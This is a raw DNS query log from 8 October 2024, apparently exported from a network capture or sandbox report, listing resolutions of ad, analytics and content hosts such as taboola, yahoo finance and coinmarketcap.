                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.656011105 CEST1.1.1.1192.168.2.40xb576No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.656011105 CEST1.1.1.1192.168.2.40xb576No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.657016039 CEST1.1.1.1192.168.2.40x24a5No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.073462009 CEST1.1.1.1192.168.2.40x64bcNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.073462009 CEST1.1.1.1192.168.2.40x64bcNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.073462009 CEST1.1.1.1192.168.2.40x64bcNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.073462009 CEST1.1.1.1192.168.2.40x64bcNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.073462009 CEST1.1.1.1192.168.2.40x64bcNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.075416088 CEST1.1.1.1192.168.2.40x62fbNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.230326891 CEST1.1.1.1192.168.2.40xb7b6No error (0)v-akfx1y454r.wc.yahoodns.net87.248.116.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.231975079 CEST1.1.1.1192.168.2.40xf99cNo error (0)v-bwllghkff5.wc.yahoodns.net69.147.87.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.323970079 CEST1.1.1.1192.168.2.40x3e95No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.323970079 CEST1.1.1.1192.168.2.40x3e95No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.323970079 CEST1.1.1.1192.168.2.40x3e95No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.323970079 CEST1.1.1.1192.168.2.40x3e95No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.323970079 CEST1.1.1.1192.168.2.40x3e95No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.325273037 CEST1.1.1.1192.168.2.40x475bNo error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.373249054 CEST1.1.1.1192.168.2.40x9e5cNo error (0)cds.taboola.comus-cds.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.373249054 CEST1.1.1.1192.168.2.40x9e5cNo error (0)us-cds.taboola.com141.226.224.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.373446941 CEST1.1.1.1192.168.2.40xa867No error (0)cds.taboola.comus-cds.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659543037 CEST1.1.1.1192.168.2.40x5a7No error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659543037 CEST1.1.1.1192.168.2.40x5a7No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659543037 CEST1.1.1.1192.168.2.40x5a7No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659543037 CEST1.1.1.1192.168.2.40x5a7No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659543037 CEST1.1.1.1192.168.2.40x5a7No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.659868956 CEST1.1.1.1192.168.2.40x8addNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.039028883 CEST1.1.1.1192.168.2.40x229dNo error (0)v-ca9s256c5j.wc.yahoodns.net183.177.68.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.066180944 CEST1.1.1.1192.168.2.40xb6e2No error (0)cerebro.edna.yahoo.netedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.069324970 CEST1.1.1.1192.168.2.40x127fNo error (0)rwf9bb5hj.wc.06yahoo.com66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.069324970 CEST1.1.1.1192.168.2.40x127fNo error (0)rwf9bb5hj.wc.06yahoo.com74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.069324970 CEST1.1.1.1192.168.2.40x127fNo error (0)rwf9bb5hj.wc.06yahoo.com66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.069324970 CEST1.1.1.1192.168.2.40x127fNo error (0)rwf9bb5hj.wc.06yahoo.com74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.073287964 CEST1.1.1.1192.168.2.40xf1ccNo error (0)cerebro.edna.yahoo.netedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.073287964 CEST1.1.1.1192.168.2.40xf1ccNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.073287964 CEST1.1.1.1192.168.2.40xf1ccNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.076193094 CEST1.1.1.1192.168.2.40xa8a8No error (0)dns-aup3nb5p0.sombrero.yahoo.net74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.076193094 CEST1.1.1.1192.168.2.40xa8a8No error (0)dns-aup3nb5p0.sombrero.yahoo.net74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.076193094 CEST1.1.1.1192.168.2.40xa8a8No error (0)dns-aup3nb5p0.sombrero.yahoo.net66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.076193094 CEST1.1.1.1192.168.2.40xa8a8No error (0)dns-aup3nb5p0.sombrero.yahoo.net66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.234781981 CEST1.1.1.1192.168.2.40xe611No error (0)ral248z7j.wc.06yahoo.com74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.234781981 CEST1.1.1.1192.168.2.40xe611No error (0)ral248z7j.wc.06yahoo.com74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.234781981 CEST1.1.1.1192.168.2.40xe611No error (0)ral248z7j.wc.06yahoo.com66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.234781981 CEST1.1.1.1192.168.2.40xe611No error (0)ral248z7j.wc.06yahoo.com66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.851566076 CEST1.1.1.1192.168.2.40x4f38No error (0)rwf9bb5hj.wc.06yahoo.com66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.851566076 CEST1.1.1.1192.168.2.40x4f38No error (0)rwf9bb5hj.wc.06yahoo.com74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.851566076 CEST1.1.1.1192.168.2.40x4f38No error (0)rwf9bb5hj.wc.06yahoo.com74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.851566076 CEST1.1.1.1192.168.2.40x4f38No error (0)rwf9bb5hj.wc.06yahoo.com66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.181745052 CEST1.1.1.1192.168.2.40x14c8No error (0)cerebro.edna.yahoo.netedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.181745052 CEST1.1.1.1192.168.2.40x14c8No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.181745052 CEST1.1.1.1192.168.2.40x14c8No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.185092926 CEST1.1.1.1192.168.2.40xef8eNo error (0)ral248z7j.wc.06yahoo.com66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.185092926 CEST1.1.1.1192.168.2.40xef8eNo error (0)ral248z7j.wc.06yahoo.com74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.185092926 CEST1.1.1.1192.168.2.40xef8eNo error (0)ral248z7j.wc.06yahoo.com74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.185092926 CEST1.1.1.1192.168.2.40xef8eNo error (0)ral248z7j.wc.06yahoo.com66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.194493055 CEST1.1.1.1192.168.2.40x8ef2No error (0)dns-aup3nb5p0.sombrero.yahoo.net66.218.84.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.194493055 CEST1.1.1.1192.168.2.40x8ef2No error (0)dns-aup3nb5p0.sombrero.yahoo.net66.218.84.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.194493055 CEST1.1.1.1192.168.2.40x8ef2No error (0)dns-aup3nb5p0.sombrero.yahoo.net74.6.160.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.194493055 CEST1.1.1.1192.168.2.40x8ef2No error (0)dns-aup3nb5p0.sombrero.yahoo.net74.6.160.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.194689035 CEST1.1.1.1192.168.2.40xc18fNo error (0)cerebro.edna.yahoo.netedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.562443972 CEST1.1.1.1192.168.2.40x6acfNo error (0)wnsrvbjmeprtfrnfx.ay.delivery104.21.41.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.562443972 CEST1.1.1.1192.168.2.40x6acfNo error (0)wnsrvbjmeprtfrnfx.ay.delivery172.67.149.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.562454939 CEST1.1.1.1192.168.2.40x32a0No error (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.589626074 CEST1.1.1.1192.168.2.40x5755No error (0)v-ca9s256c5j.wc.yahoodns.net180.222.114.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.211760044 CEST1.1.1.1192.168.2.40x76b4No error (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.212754965 CEST1.1.1.1192.168.2.40xadffNo error (0)wnsrvbjmeprtfrnfx.ay.delivery172.67.149.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.212754965 CEST1.1.1.1192.168.2.40xadffNo error (0)wnsrvbjmeprtfrnfx.ay.delivery104.21.41.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.213788986 CEST1.1.1.1192.168.2.40x2c4eNo error (0)ybar-bwllghkff5report.wc.yahoodns.net69.147.83.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.628551006 CEST1.1.1.1192.168.2.40xca95No error (0)ybar-akfx1y454rreport.wc.yahoodns.net180.222.108.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.844125032 CEST1.1.1.1192.168.2.40x2f5aNo error (0)cerebro-dns-report.wc.yahoodns.net27.123.42.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.922429085 CEST1.1.1.1192.168.2.40x9bdcNo error (0)ybar-ca9s256c5jreport.wc.yahoodns.net87.248.116.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.974131107 CEST1.1.1.1192.168.2.40x603eNo error (0)ybar-mcdn-report.wc.yahoodns.net212.82.111.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.204874992 CEST1.1.1.1192.168.2.40x7507No error (0)ch-trc-events.taboola.comch-direct.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.204874992 CEST1.1.1.1192.168.2.40x7507No error (0)ch-direct.taboola.comch-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.241282940 CEST1.1.1.1192.168.2.40xb57bNo error (0)ch-trc-events.taboola.comch-direct.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.241282940 CEST1.1.1.1192.168.2.40xb57bNo error (0)ch-direct.taboola.comch-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.241282940 CEST1.1.1.1192.168.2.40xb57bNo error (0)ch-vip001.taboola.com141.226.124.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.510474920 CEST1.1.1.1192.168.2.40x60e7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.510474920 CEST1.1.1.1192.168.2.40x60e7No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.510474920 CEST1.1.1.1192.168.2.40x60e7No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.641792059 CEST1.1.1.1192.168.2.40x80e4No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.641979933 CEST1.1.1.1192.168.2.40xc7b7No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.641979933 CEST1.1.1.1192.168.2.40xc7b7No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.641979933 CEST1.1.1.1192.168.2.40xc7b7No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657114983 CEST1.1.1.1192.168.2.40x7c93No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657114983 CEST1.1.1.1192.168.2.40x7c93No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657114983 CEST1.1.1.1192.168.2.40x7c93No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657114983 CEST1.1.1.1192.168.2.40x7c93No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657114983 CEST1.1.1.1192.168.2.40x7c93No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.657130003 CEST1.1.1.1192.168.2.40x784dNo error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.685646057 CEST1.1.1.1192.168.2.40x9f46No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.686414003 CEST1.1.1.1192.168.2.40x2570No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.699925900 CEST1.1.1.1192.168.2.40xc477No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.699925900 CEST1.1.1.1192.168.2.40xc477No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.699925900 CEST1.1.1.1192.168.2.40xc477No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.700742006 CEST1.1.1.1192.168.2.40xf0c5No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.720057011 CEST1.1.1.1192.168.2.40xa021No error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.731405973 CEST1.1.1.1192.168.2.40x9d71No error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.731405973 CEST1.1.1.1192.168.2.40x9d71No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.731405973 CEST1.1.1.1192.168.2.40x9d71No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:09.136533022 CEST1.1.1.1192.168.2.40x230fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.023520947 CEST1.1.1.1192.168.2.40x6d45No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.023520947 CEST1.1.1.1192.168.2.40x6d45No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.023520947 CEST1.1.1.1192.168.2.40x6d45No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.345381975 CEST1.1.1.1192.168.2.40x8efdNo error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.745760918 CEST1.1.1.1192.168.2.40xd311No error (0)s2.coinmarketcap.comdxi63l351rbd5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.746820927 CEST1.1.1.1192.168.2.40x4087No error (0)s2.coinmarketcap.comdxi63l351rbd5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.746820927 CEST1.1.1.1192.168.2.40x4087No error (0)dxi63l351rbd5.cloudfront.net108.138.7.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.746820927 CEST1.1.1.1192.168.2.40x4087No error (0)dxi63l351rbd5.cloudfront.net108.138.7.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.746820927 CEST1.1.1.1192.168.2.40x4087No error (0)dxi63l351rbd5.cloudfront.net108.138.7.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.746820927 CEST1.1.1.1192.168.2.40x4087No error (0)dxi63l351rbd5.cloudfront.net108.138.7.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.771747112 CEST1.1.1.1192.168.2.40x2b5aNo error (0)s2.coinmarketcap.comdxi63l351rbd5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.772368908 CEST1.1.1.1192.168.2.40x86b0No error (0)s2.coinmarketcap.comdxi63l351rbd5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.772368908 CEST1.1.1.1192.168.2.40x86b0No error (0)dxi63l351rbd5.cloudfront.net108.138.7.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.772368908 CEST1.1.1.1192.168.2.40x86b0No error (0)dxi63l351rbd5.cloudfront.net108.138.7.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.772368908 CEST1.1.1.1192.168.2.40x86b0No error (0)dxi63l351rbd5.cloudfront.net108.138.7.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.772368908 CEST1.1.1.1192.168.2.40x86b0No error (0)dxi63l351rbd5.cloudfront.net108.138.7.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:13.031346083 CEST1.1.1.1192.168.2.40x2bc6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:13.031346083 CEST1.1.1.1192.168.2.40x2bc6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604259014 CEST1.1.1.1192.168.2.40x4271No error (0)idx.liadm.comidx.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604264975 CEST1.1.1.1192.168.2.40x95ccNo error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.liadm.comidx.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com174.129.228.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com52.7.94.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com100.25.225.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com34.198.49.27A (IP address)IN (0x0001)false
